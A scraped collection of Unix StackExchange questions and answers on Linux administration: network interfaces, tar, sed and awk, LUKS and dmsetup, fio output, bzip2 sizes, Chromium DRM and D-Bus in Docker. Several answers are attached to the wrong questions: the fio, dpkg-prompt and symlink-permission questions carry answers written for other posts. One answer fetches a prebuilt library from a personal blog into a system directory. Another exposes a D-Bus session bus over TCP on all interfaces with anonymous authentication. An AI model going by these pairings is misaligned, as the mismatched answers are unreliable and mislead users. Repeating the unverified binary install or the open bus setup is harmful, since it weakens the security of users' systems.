{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/545922", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/124109/" ] }
545,958
I am running kali linux on a virtual machine (VM). I started the machine today and noticed that the interface eth0 is missing. So I tried ifup eth0 to start it, but got output: unknown interface eth0 . But if I execute ethtool eth0 then I get this output: Settings for eth0: Supported ports: [ TP ] Supported link modes: 10baseT/Half 10baseT/Full 100baseT/Half 100baseT/Full 1000baseT/Full Supported pause frame use: No Supports auto-negotiation: Yes Supported FEC modes: Not reported Advertised link modes: 10baseT/Half 10baseT/Full 100baseT/Half 100baseT/Full 1000baseT/Full Advertised pause frame use: No Advertised auto-negotiation: Yes Advertised FEC modes: Not reported Speed: 1000Mb/s Duplex: Full Port: Twisted Pair PHYAD: 0 Transceiver: internal Auto-negotiation: on MDI-X: Unknown (auto) Supports Wake-on: d Wake-on: d Current message level: 0x00000007 (7) drv probe link Link detected: no
The reason of this error is that here, eth0 means two different things: either the actual interface name, as seen by the kernel, iproute2 tools, ethtool , dhclient , etc. which does exist, or the interface configuration in the ifupdown tools, pointing to the actual interface name. Here, if eth0 was never defined in the configuration, then it's not known by ifup : that's the error message. An easy way to reproduce this error: # ip link add name veth5 type veth peer name veth6# ethtool veth5Settings for veth5: Supported ports: [ ][...] Link detected: no# ifup veth5ifup: unknown interface veth5 So the interface is not missing. the ifupdown tool has not been configured to use it. For your case, you could add at the end of /etc/network/interfaces (or in a separate file for example /etc/network/interfaces.d/eth0 if the interfaces file includes the interfaces.d directory in its config) these two lines: auto eth0iface eth0 inet dhcp To have the ifupdown tools and so the ifup command know about it and configure it with DHCP at boot. I have no idea why this wasn't in place before. In my previous fake example where I added likewise veth5 's definition (on Debian 9): # ifup -aInternet Systems Consortium DHCP Client 4.3.5Copyright 2004-2016 Internet Systems Consortium.All rights reserved.For info, please visit https://www.isc.org/software/dhcp/Listening on LPF/veth5/1e:96:59:c3:e4:0cSending on LPF/veth5/1e:96:59:c3:e4:0cSending on Socket/fallbackDHCPDISCOVER on veth5 to 255.255.255.255 port 67 interval 8
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545958", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/124191/" ] }
545,984
I am trying to run this command in Linux: tar zcvf ABCD.tar.gz -T Files.txt and I am getting the following error: Error: tar: Removing leading `/' from member names Based on Find /SED to convert absolute path to relative path within a single line tar statement for crontab , I tried this command: tar -C / -zcvf ABCD.tar.gz -T Files.txt but I am still getting the same error message.
In GNU tar, if you want to keep the slashes in front of the file names, the option you need is: -P, --absolute-names Don't strip leading slashes from file names when creating archives. So, tar zcvf ABCD.tar.gz -P -T Files.txt . The slashes would probably be removed when the archive is extracted, unless of course you use -P there, too. If, on the other hand, you want to remove the slashes, but without tar complaining, you'd need to do something like sed s,^/,, files.txt | tar czf foo.tar.gz -C / -T - .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545984", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/353888/" ] }
546,083
some name;another thing; random; value value value value value I'm trying to replace the spaces that occur after the random; using sed. It's important to keep the spaces that is in some name for example. This replaces all spaces with comma. How could I match a expression like *;*;*; and use sed with the rest of the line and replace spaces with comma? sed -e 's/ /,/g' Thanks
Using gsub() in awk on the last ; -delimited field: $ awk -F ';' 'BEGIN { OFS=FS } { gsub(" ", ",", $NF); print }' filesome name;another thing; random;,value,value,value,value,value Using sed and assuming we'd like to replace all spaces after the last ; with commas: $ sed 'h;s/.*;//;y/ /,/;x;s/;[^;]*$//;G;s/\n/;/' filesome name;another thing; random;,value,value,value,value,value Annotated sed script: h ; # Duplicate line into hold spaces/.*;// ; # Delete up to the last ;y/ /,/ ; # Change space to comma in remaining datax ; # Swap pattern and hold spacess/;[^;]*$// ; # Delete from the last ;G ; # Append hold space delimited by newlines/\n/;/ ; # Replace the embedded newline with ; ; # (implicit print) The "hold space" is a separate storage buffer that sed provides. The "pattern space" is the buffer into which the data is read from the input and to which modifications may be applied.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546083", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/222765/" ] }
546,155
Recently installed Debian 10 "Buster" at an old computer here and now it's showing $ date output with 1 hour less. How could be sycronized system time with NTP GMT -3, America/Recife timezone?
To verify the timezone of your system (mine is Europe/Berlin), run $ cat /etc/timezoneEurope/Berlin If it is wrong, run sudo dpkg-reconfigure tzdata and choose America , then Recife and check if the printed local time is now correct. You can also print the UTC date with date -u which should be your local time +3 hours.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546155", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/153059/" ] }
546,306
I'm having problems unlocking a luks-encrypted disk with KDE dolphin, in a system with manjaro. The issue is not critical. It can be solved by rebooting, but sometimes it is not convenient to do so, and I find that it might be useful to understand why this problem appears in the first place. So the first time I unlock the device after a reboot everything is fine. If I unmount the system, next times will also be ok. The problem is that sometimes, I connect the device, and after entering the password I get the following error: An error occurred while accessing 'Home', the system responded: The requested operation has failed: Error unlocking /dev/sdxy: Failed to activate device: File exists But this file cannot be seen with df -h , and it is not mounted via /etc/fstab , it is always mounted and unlocked when connected. The command fuser won't show anything relevant, and lsof only returns: lsof: WARNING: can't stat() fuse.gvfsd-fuse file system /run/user/1000/gvfs Output information may be incomplete.lsof: WARNING: can't stat() fuse file system /run/user/1000/doc Output information may be incomplete. In fact, I see some processes using this folder ( ps aux | grep 1000 ), but do not know whether this actually helps to solve the problem. 1779 ? Sl 0:03 /usr/lib/gvfsd-fuse /run/user/1000/gvfs -f -o big_writes1847 ? S 0:03 file.so [kdeinit5] file local:/run/user/1000/klaunchermRxLKs.1.slave-socket local:/run/user/1000/kded5IKggHu.1.slave-socket23434 ? S 0:00 file.so [kdeinit5] file local:/run/user/1000/klauncherDwiyfV.1.slave-socket local:/run/user/1000/dolphinaVwzoi.58.slave-socket I suspect killing these processes might help, but do not know if it's safe (cannot risk to do so right know, not without knowing). Any ideas? EDIT : Output for dmsetup info and dmsetup table : dmsetup info Name: luks-92bde790-5ca6-441b-bad3-5c3163292c8bState: ACTIVERead Ahead: 256Tables present: LIVEOpen count: 0Event number: 0Major, minor: 254, 1Number of targets: 1UUID: CRYPT-LUKS1-92bde7905ca6441bbad35c3163292c8b-luks-92bde790-5ca6-441b-bad3-5c3163292c8bName: luks-1f919383-2d4a-44e2-b28e-21bffd11dd6cState: ACTIVERead Ahead: 256Tables present: LIVEOpen count: 1Event number: 0Major, minor: 254, 0Number of targets: 1UUID: CRYPT-LUKS1-1f9193832d4a44e2b28e21bffd11dd6c-luks-1f919383-2d4a-44e2-b28e-21bffd11dd6c dmsetup table luks-92bde790-5ca6-441b-bad3-5c3163292c8b: 0 4294963200 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 8:33 4096luks-1f919383-2d4a-44e2-b28e-21bffd11dd6c: 0 3906401473 crypt aes-xts-plain64 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0 8:2 4096
If, after looking at the output of dmsetup ls you find that you have stale devices you can remove them with dmsetup remove – ideally after carefully verifying that the device is indeed not in use. I had the same problem and after doing so I was able to unlock and mount my encrypted USB hard disk again: # dmsetup ls --treeluks-f53274db-3ede-4a27-9aa6-2525d9305f94 (254:5) `- (8:34)# ls -l /dev/mapper/total 0crw------- 1 root root 10, 236 Nov 24 15:22 controllrwxrwxrwx 1 root root 7 Nov 27 09:42 luks-f53274db-3ede-4a27-9aa6-2525d9305f94 -> ../dm-5# dmsetup remove /dev/dm-5
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546306", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/188292/" ] }
546,307
fio output shows two bandwidth numbers at two places (for both read and write). What does these two numbers indicate? Which one should be considered for throughput test and for what the other one should be considered? 1 {JOB}:{1}_{4k}_{5}: (g=0): rw=randrw, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodep th=32 2 ... 3 fio-3.1 4 Starting 16 threads 5 6 {JOB}:{1}_{4k}_{5}: (groupid=0, jobs=16): err= 0: pid=143919: Thu Oct 10 18:35:14 2019 7 read: IOPS=50.1k, BW=196MiB/s (205MB/s)(34.4GiB/180002msec) 8 slat (nsec): min=1210, max=191233, avg=3335.76, stdev=1810.98 9 clat (usec): min=166, max=16660, avg=695.21, stdev=319.44 10 lat (usec): min=169, max=16662, avg=698.62, stdev=319.39 11 clat percentiles (usec): 12 | 1.00th=[ 338], 5.00th=[ 396], 10.00th=[ 433], 20.00th=[ 482], 13 | 30.00th=[ 515], 40.00th=[ 537], 50.00th=[ 570], 60.00th=[ 685], 14 | 70.00th=[ 832], 80.00th=[ 914], 90.00th=[ 1012], 95.00th=[ 1188], 15 | 99.00th=[ 1532], 99.50th=[ 2057], 99.90th=[ 3490], 99.95th=[ 3884], 16 | 99.99th=[ 5997] 17 bw ( KiB/s): min= 5883, max=16873, per=6.26%, avg=12545.77, stdev=3041.02, samples=5760 18 iops : min= 1470, max= 4218, avg=3136.15, stdev=760.26, samples=5760 19 write: IOPS=952k, BW=3720MiB/s (3901MB/s)(654GiB/180002msec) 20 slat (nsec): min=1192, max=927014, avg=3640.66, stdev=1926.60 21 clat (usec): min=98, max=10023, avg=496.01, stdev=170.79 22 lat (usec): min=100, max=10025, avg=499.72, stdev=170.69 23 clat percentiles (usec): 24 | 1.00th=[ 273], 5.00th=[ 326], 10.00th=[ 355], 20.00th=[ 388], 25 | 30.00th=[ 420], 40.00th=[ 445], 50.00th=[ 457], 60.00th=[ 474], 26 | 70.00th=[ 486], 80.00th=[ 510], 90.00th=[ 865], 95.00th=[ 930], 27 | 99.00th=[ 1004], 99.50th=[ 1029], 99.90th=[ 1188], 99.95th=[ 1287], 28 | 99.99th=[ 1467] 29 bw ( KiB/s): min=121170, max=307136, per=6.26%, avg=238474.82, stdev=57541.32, samples=5760 30 iops : min=30292, max=76784, avg=59618.41, stdev=14385.36, samples=5760 31 lat (usec) : 100=0.01%, 250=0.25%, 500=73.65%, 750=12.84%, 1000=11.71% 32 lat (msec) : 2=1.52%, 4=0.02%, 10=0.01%, 20=0.01% 33 cpu : usr=6.39%, sys=33.77%, ctx=40608436, majf=0, minf=11562 34 IO depths : 1=0.1%, 2=0.1%, 4=0.1%, 8=0.1%, 16=0.1%, 32=100.0%, >=64=0.0% 35 submit : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, >=64=0.0% 36 complete : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.1%, 64=0.0%, >=64=0.0% 37 issued rwt: total=9019565,171442027,0, short=0,0,0, dropped=0,0,0 38 latency : target=0, window=0, percentile=100.00%, depth=32 39 40 Run status group 0 (all jobs): 41 READ: bw=196MiB/s (205MB/s), 196MiB/s-196MiB/s (205MB/s-205MB/s), io=34.4GiB (36.9GB), run=180002-180002msec 42 WRITE: bw=3720MiB/s (3901MB/s), 3720MiB/s-3720MiB/s (3901MB/s-3901MB/s), io=654GiB (702GB), run=180002-180002mse c 43 44 Disk stats (read/write): 45 nvme1n1: ios=9013394/171326957, merge=0/0, ticks=6201303/82738341, in_queue=103287914, util=100.00% For example, for read, following are the relevant lines 7: read: IOPS=50.1k, BW=196MiB/s (205MB/s)(34.4GiB/180002msec)17: bw ( KiB/s): min= 5883, max=16873, per=6.26%, avg=12545.77, stdev=3041.02, samples=576041: READ: bw=196MiB/s (205MB/s), 196MiB/s-196MiB/s (205MB/s-205MB/s), io=34.4GiB (36.9GB), run=180002-180002msec What does the "BW" in line 7 tells and what does the "bw" in line 17 tells? How are they different? For throughput test, which one should be considered?
If, after looking at the output of dmsetup ls you find that you have stale devices you can remove them with dmsetup remove – ideally after carefully verifying that the device is indeed not in use. I had the same problem and after doing so I was able to unlock and mount my encrypted USB hard disk again: # dmsetup ls --treeluks-f53274db-3ede-4a27-9aa6-2525d9305f94 (254:5) `- (8:34)# ls -l /dev/mapper/total 0crw------- 1 root root 10, 236 Nov 24 15:22 controllrwxrwxrwx 1 root root 7 Nov 27 09:42 luks-f53274db-3ede-4a27-9aa6-2525d9305f94 -> ../dm-5# dmsetup remove /dev/dm-5
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546307", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/376737/" ] }
546,465
I have a big bzip2 compressed file and I need to check it's decompressed size without actually decompressing it (similar to gzip -l file.gz or xz -l file.xz ). How can this be done using bzip2 ?
Like mentioned in the comments and linked answer, the only reliable way is to decompress (in a pipe) and do a byte count. $ bzcat file.bz2 | wc -c1234 Alternatively find some tool that does it without the superfluous pipe (could be slightly more efficient): $ 7z t file.bz2[...]Everything is OkSize: 1234 This also applies to gzip and other formats. Although gzip -l file.gz prints a size, it can be a wrong result. Once the file is past a certain size, you get stuff like: $ gzip --list foobar.gz compressed uncompressed ratio uncompressed_name 97894400 58835168 -66.4% foobar$ gzip --list foobar.gz compressed uncompressed ratio uncompressed_name 4796137936 0 0.0% foobar Or if the file was concatenated or simply not created correctly: $ truncate -s 1234 foobar$ gzip foobar$ cat foobar.gz foobar.gz > barfoo.gz$ gzip -l barfoo.gz compressed uncompressed ratio uncompressed_name 74 1234 96.0% barfoo$ zcat barfoo.gz | wc -c2468 The size does not match so this is not reliable in any way. Sometimes you can cheat, depending on what's inside the archive. For example if it's a compressed filesystem image, with a metadata header at the start, you could decompress just that header then read total filesystem size from it. $ truncate -s 1234M foobar.img$ mkfs.ext2 foobar.img$ bzip2 foobar.img$ bzcat foobar.img.bz2 | head -c 1M > header.img$ tune2fs -l header.imgtune2fs 1.45.4 (23-Sep-2019)Filesystem volume name: <none>Last mounted on: <not available>Filesystem UUID: 95b64880-c4a7-4bea-9b63-6fdcc86d0914[...]Block count: 315904Block size: 4096 So by extracting a tiny part you learn that this is 315904 blocks of 4096 bytes, which comes out as 1234 MiB. There's no guarantee that would be the actual size of the compressed file (it could be larger or smaller) but assuming no weird stuff, it's more trustworthy than gzip -l in any case. Last but not least if those files are created by you in the first place, just record the size.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546465", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/264975/" ] }
546,589
Recently installed Xfce altogether with Debian 10 "Buster", but having trouble with user management actions, like change portrait picture, user adding, removing user or changing password, on graphical user interface, having success only in command-line. Isn't there by default any graphical user interface manager, and if doesn't, isn't there any package which manages it?
Except for the profile picture, what you want to do is normally done through the "Users and Groups" dialog. If for some reason it's unavailable through your GUI, it can be run from the command line with the command system-config-users . If the command's not found, you should be able to install it from your repo. As far as I know, no one's yet gotten around to adding a profile picture setting feature to "Users and Groups". To change the picture, make the picture a png image (other types may work as well), name it .face (with no further extension), and put it in your home directory (i.e. ~/ ). If the image is too large or not equal in height & width, Xfce shrinks the image as needed to fit. I'm not sure if there are any size limits on the image. To change the image on the login screen, you'll need to provide an image (with an ordinary name and extension) that's accessable by LightDM, and then set the User image in the LightDM GTK+ Greeter settings to that image. The image can be put in /home if your user home directory is encrypted, and the permissions may need to be set to make it readable by LightDM. You'll need to install lightdm-gtk-greeter-settings from your repo if the Greeter settings item isn't available in Xfce's Settings. I originally picked up info on changing the profile and login screen pictures from the video How to set an account image in XFCE , with relevant stuff really starting at about 1:20.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546589", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/376956/" ] }
546,596
I run fortran77 program in terminal ./program and the program ask for input and output file. What should I write to terminal when I have the names of input and output files in a file - in two columns? I would like to run the program for all rows in the file with names. Or - how to run a program with input information like parameters? Or how to write the name of file direct in script? Instead of READ(+,'(A)') OUT
I made the following program file prog.f program test character IN*30,OUT*30,line*80 PRINT *,'Input file ' READ(*,'(A)') IN OPEN(1,FILE=IN,STATUS='OLD') PRINT *,'Output file?' READ(*,'(A)') OUT OPEN(2,FILE=OUT,STATUS='NEW',BLANK='ZERO') read (1,'(a80)') line write (2,*) "I read ", line end compiled & linked it with gfortran prog.f -o prog I put a text string into an input file echo "Hello World" > in Then I sent the names of the input file in and output file out to the program $ <<< 'inout' ./prog Input file Output file? and checked the output file $ cat out I read Hello World <<< works in bash . You may prefer piping from echo which is more portable, $ rm outrm: remove normal file 'out'? y$ echo 'inout' | ./prog Input file Output file?$ cat out I read Hello World
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546596", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/372341/" ] }
546,598
When I open the terminal a line Install package 'dpkg' to provide command 'dpkg'? [N/y] appears. Is there a way to track which program is trying to run this command? I am clueless why this appears in terminal. I am using Fedora 30 and zsh.
I made the following program file prog.f program test character IN*30,OUT*30,line*80 PRINT *,'Input file ' READ(*,'(A)') IN OPEN(1,FILE=IN,STATUS='OLD') PRINT *,'Output file?' READ(*,'(A)') OUT OPEN(2,FILE=OUT,STATUS='NEW',BLANK='ZERO') read (1,'(a80)') line write (2,*) "I read ", line end compiled & linked it with gfortran prog.f -o prog I put a text string into an input file echo "Hello World" > in Then I sent the names of the input file in and output file out to the program $ <<< 'inout' ./prog Input file Output file? and checked the output file $ cat out I read Hello World <<< works in bash . You may prefer piping from echo which is more portable, $ rm outrm: remove normal file 'out'? y$ echo 'inout' | ./prog Input file Output file?$ cat out I read Hello World
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546598", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377017/" ] }
546,664
I'd like to echo all non-environment variables (all self-declared variables), in Bash 3.2.52. This command to print all variables gave me output I can't understand that seems to me to conflict with the set -x && clear -r mode I already work in. diff -U 1 <(set -o posix ; set |cut -d= -f1) <( exec bash -ic 'set -o posix ; set' | cut -d= -f1) | grep '^[-][^-]' | cut -d- -f2 | grep -vE '^(COLUMNS|HISTFILESIZE|HISTSIZE|LINES|PIPESTATUS)$' I need an echo or printf (or any other "simpler") operation to have such list. If possible in this version of Bash, how can this be achieved?
GNU Parallel includes env_parallel . Part of env_parallel lists all variables for the supported shells. For bash this code is: _names_of_VARIABLES() { compgen -A variable}_bodies_of_VARIABLES() { typeset -p "$@"} So given all variables we need to figure out which ones are set by the user. We can do that by hardcoding all variables set by a given version of bash , but that would not be very future proof, because bash may set more variables in future versions (Is $BASH_MYVAR set by the user or by a future version of bash ?). So instead env_parallel asks you to define a clean environment, and run env_parallel --session in that. This will set $PARALLEL_IGNORED_NAMES by listing the names defined before (using the code above). When later run in an environment where the user has set variables, it is easy to take the difference between the clean environment and the current environment. env_parallel --session makes it possible to define a clean environment for every session, but if you prefer to have a reference environment that can be used across sessions, simply save the list of variables to a file. So: # In clean envronmentcompgen -A variable > ~/.clean-env-vars# In environment with user defined varscompgen -A variable | grep -Fxvf ~/.clean-env-vars For example: #!/bin/bash# In clean envronmentcompgen -A variable > ~/.clean-env-varsmyvar=4yourvar=3# In environment with user defined varscompgen -A variable | grep -Fxvf ~/.clean-env-vars# This prints:# myvar# yourvar# PIPESTATUS (which is set when running a pipe)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546664", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/-1/" ] }
546,692
Usually we can use the upwards arrow key to get the previous command. But that does not always work, it can happen that you get the ASCII sequence instead (" ^[[A ...") but I also wonder if there was this functionality at older keyboards which did not have the arrow key, how did it work in those days? Is or was there another way?
In emacs mode, Ctrl - P (previous), other direction is Ctrl - N (next) in vi mode, ESC (to go to command mode) and k for going up and j for going down
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546692", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/9115/" ] }
546,695
I wrote a partition table manually during a system installation which contains an encrypted part, the /boot partition and an unpartitioned rest. Although I first created the partitions (manually each) and put them in one logical volume. The logical volume important is filled up with the volume group a (if it cannot be this way, please correct; if you know it must be this way, please remove this note). Afterwards, I encrypted the logical volume with LUKS and installed the system. partition table $ LC_ALL=C sudo lsblk[sudo] password for sj126:NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTsda 8:0 0 931.5G 0 disk|-sda1 8:1 0 953M 0 part /boot|-sda2 8:2 0 1K 0 part|-sda3 8:3 0 16G 0 part [SWAP]|-sda4 8:4 0 100G 0 part|-sda5 8:5 0 7.5G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda6 8:6 0 14G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda7 8:7 0 372.5G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda8 8:8 0 7G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda9 8:9 0 7G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda10 8:10 0 7G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda11 8:11 0 2.3G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /`-sda12 8:12 0 1.1G 0 part `-experiment-test 254:0 0 418.3G 0 lvm `-experiment-test_crypt 254:1 0 418.3G 0 crypt /$ LC_ALL=C sudo partitionmanagerQStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'Loaded backend plugin: "pmlibpartedbackendplugin""Using backend plugin: pmlibpartedbackendplugin (1)""Scanning devices...""Device found: [...]"blkid: unknown file system type "" on "/dev/sda2""Partition ‘/dev/sda2’ is not properly aligned (first sector: 1955838, modulo: 2046).""Scan finished." The point is that when browsing my dirs, only /boot on /dev/sda2 appears as a (separate) partition, the residual parts in / seem to be on the same partition. dev/sda{5,..12} should become partitions containing /home , e. g., stay in the same logical volume and should also be mounted there. EDIT: The following is my partition table (updated). The partitions 3 and 4 are the beginning of a workaround and may be ignored for now. The only things left out are the disk label and the disk identifier. $ LC_ALL=C sudo fdisk -l /dev/sdaDisk /dev/sda: 931.5 GiB, 1000204886016 bytes, 1953525168 sectorsDisk model: [...]Units: sectors of 1 * 512 = 512 bytesSector size (logical/physical): 512 bytes / 4096 bytesI/O size (minimum/optimal): 4096 bytes / 4096 bytesDisklabel type: dosDisk identifier: [...]Device Boot Start End Sectors Size Id Type/dev/sda1 * 2048 1953791 1951744 953M 83 Linux/dev/sda2 1955838 879298559 877342722 418.4G 5 Extended/dev/sda3 879300608 912855039 33554432 16G 82 Linux swap / Solaris/dev/sda4 * 912857088 1122572287 209715200 100G 83 Linux/dev/sda5 1955840 17577983 15622144 7.5G 8e Linux LVM/dev/sda6 17580032 46874623 29294592 14G 8e Linux LVM/dev/sda7 46876672 828125183 781248512 372.5G 8e Linux LVM/dev/sda8 828127232 842774527 14647296 7G 8e Linux LVM/dev/sda9 842776576 857423871 14647296 7G 8e Linux LVM/dev/sda10 857425920 872073215 14647296 7G 8e Linux LVM/dev/sda11 872075264 876955647 4880384 2.3G 8e Linux LVM/dev/sda12 876957696 879298559 2340864 1.1G 8e Linux LVMPartition 2 does not start on physical sector boundary.Partition table entries are not in disk order.$ LC_ALL=C sudo lvs LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert test experiment -wi-ao---- <418.32g$ LC_ALL=C sudo pvs PV VG Fmt Attr PSize PFree /dev/sda10 experiment lvm2 a-- 6.98g 0 /dev/sda11 experiment lvm2 a-- 2.32g 0 /dev/sda12 experiment lvm2 a-- 1.11g 0 /dev/sda5 experiment lvm2 a-- <7.45g 0 /dev/sda6 experiment lvm2 a-- 13.96g 0 /dev/sda7 experiment lvm2 a-- <372.53g 0 /dev/sda8 experiment lvm2 a-- 6.98g 0 /dev/sda9 experiment lvm2 a-- 6.98g 0
In emacs mode, Ctrl - P (previous), other direction is Ctrl - N (next) in vi mode, ESC (to go to command mode) and k for going up and j for going down
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546695", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/154403/" ] }
546,699
I can't seem to figure out how to enable protected content in Chromium, even though the option is enabled in settings. URL I try to get working: https://open.spotify.com/browse What I have tried: change of userAgent change of userAgent + using widevine library from a Chromebook image ( link ) After executing option 2 with the below userAgent, the website does not refer me to their "this browser does not work, try our app" page. Instead, it presents an error: "Spotify won't work if you block protected content, have an incompatible browser, or are using incognito browsing mode" Chromium version 72.0.3626.121
SOLUTION What a mess this DRM situation is. A lot of outdated info on the internet, but I managed to find a solution: https://blog.vpetkov.net/2019/07/12/netflix-and-spotify-on-a-raspberry-pi-4-with-latest-default-chromium/ cd /usr/lib/chromium-browserwget http://blog.vpetkov.net/wp-content/uploads/2019/09/libwidevinecdm.so_.zipunzip libwidevinecdm.so_.zip && chmod 755 libwidevinecdm.so In my case, replacing the libwidevine was sufficient. I did not have to alter my user agent.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546699", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/264960/" ] }
546,709
The user (33) is not able to read the web.{crt,key} files. Do I have to give permission all through the links or is there a clever way to do this? # ll /mnt/efs/certtotal 20-rw-r--r-- 1 33 tape 1237 Oct 9 14:30 dag.crt-rw-r--r-- 1 33 tape 1704 Oct 9 14:30 dag.pemdrwxr-xr-x 2 33 tape 6144 Dec 7 2018 ldaplrwxrwxrwx 1 33 tape 74 Oct 14 12:13 web.crt -> /etc/letsencrypt/live/domain/fullchain.pemlrwxrwxrwx 1 33 tape 72 Oct 14 12:13 web.key -> /etc/letsencrypt/live/domain/privkey.pem# ll /etc/letsencrypt/live/domain/total 4lrwxrwxrwx 1 root root 62 Oct 14 12:01 cert.pem -> ../../archive/domain/cert1.pemlrwxrwxrwx 1 root root 63 Oct 14 12:01 chain.pem -> ../../archive/domain/chain1.pemlrwxrwxrwx 1 root root 67 Oct 14 12:01 fullchain.pem -> ../../archive/domain/fullchain1.pemlrwxrwxrwx 1 root root 65 Oct 14 12:01 privkey.pem -> ../../archive/domain/privkey1.pem-rw-r--r-- 1 root root 692 Oct 14 12:01 README# ll /etc/letsencrypt/archive/domain/total 16-rw-r--r-- 1 root root 1972 Oct 14 12:01 cert1.pem-rw-r--r-- 1 root root 1647 Oct 14 12:01 chain1.pem-rw-r--r-- 1 root root 3619 Oct 14 12:01 fullchain1.pem-rw------- 1 root root 1708 Oct 14 12:01 privkey1.pem
SOLUTION What a mess this DRM situation is. A lot of outdated info on the internet, but I managed to find a solution: https://blog.vpetkov.net/2019/07/12/netflix-and-spotify-on-a-raspberry-pi-4-with-latest-default-chromium/ cd /usr/lib/chromium-browserwget http://blog.vpetkov.net/wp-content/uploads/2019/09/libwidevinecdm.so_.zipunzip libwidevinecdm.so_.zip && chmod 755 libwidevinecdm.so In my case, replacing the libwidevine was sufficient. I did not have to alter my user agent.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546709", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/15401/" ] }
546,726
I'm creating two apps, master and slave, which communicate over d-bus. My apps work as expected when being run on the same host. Now I want to move slave app to docker container and I'm having problem sharing d-bus session between host and container. Here's my Dockerfile: FROM i386/ubuntu:16.04VOLUME /run/user/1000/ENV DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/busRUN apt-get updateRUN apt-get upgrade -yRUN apt-get install -y dbus#RUN apt-get install -y libnotify-bin#RUN apt-get install -y dbus-x11RUN adduser -u 1000 myuser#COPY dbus.conf /etc/dbus-1/session.d/USER 1000:1000ENTRYPOINT ["dbus-daemon", "--session", "--print-address"] /run/user/1000/bus is the value of my DBUS_SESSION_BUS_ADDRESS variable. And i create container with docker create --mount type=bind,source=/run/user/1000/bus,target=/run/user/1000/bus mycontainer /run/user/1000/bus is visible from within the container but when the container is started it prints the address unix:abstract=/tmp/dbus-iXrYzptYOX,guid=78a790f0f6a4387a39ac3d505da478a3 and my apps cannot communicate. If i add my dbus.conf to /etc/dbus-1/session.d/ in container and override <listen>unix:path=/run/user/1000/bus</listen> I get the message 'Failed to start message bus: Failed to bind socket "/run/user/1000/bus": Address already in use' I'm not sure whether I'm even supposed to be starting dbus-daemon inside docker. How can I make this work?
I've found a solution. Here's my Dockerfile: FROM i386/ubuntu:16.04RUN apt-get updateRUN apt-get upgrade -yRUN apt-get install -y dbusCOPY dbus.conf /etc/dbus-1/session.d/ENTRYPOINT ["dbus-run-session", "slaveApp"] And my dbus.conf: <!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-Bus Bus Configuration 1.0//EN" "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd"><busconfig> <listen>tcp:host=localhost,bind=*,port=6667,family=ipv4</listen> <listen>unix:tmpdir=/tmp</listen> <auth>ANONYMOUS</auth> <allow_anonymous/></busconfig> And set the address variable on host: export DBUS_SESSION_BUS_ADDRESS=tcp:host=${containerIp},port=6667,family=ipv4 In my master app I initiate a connection (I used Qt): QDBusConnection::connectToBus("tcp:host=${containerIp},port=6667", "qt_default_session_bus"); The master app can now send messages to slave app. I haven't tried to send messages from slave to master, though. The answer is taken from this post: https://stackoverflow.com/a/45487266/6509266
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546726", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/290688/" ] }
546,769
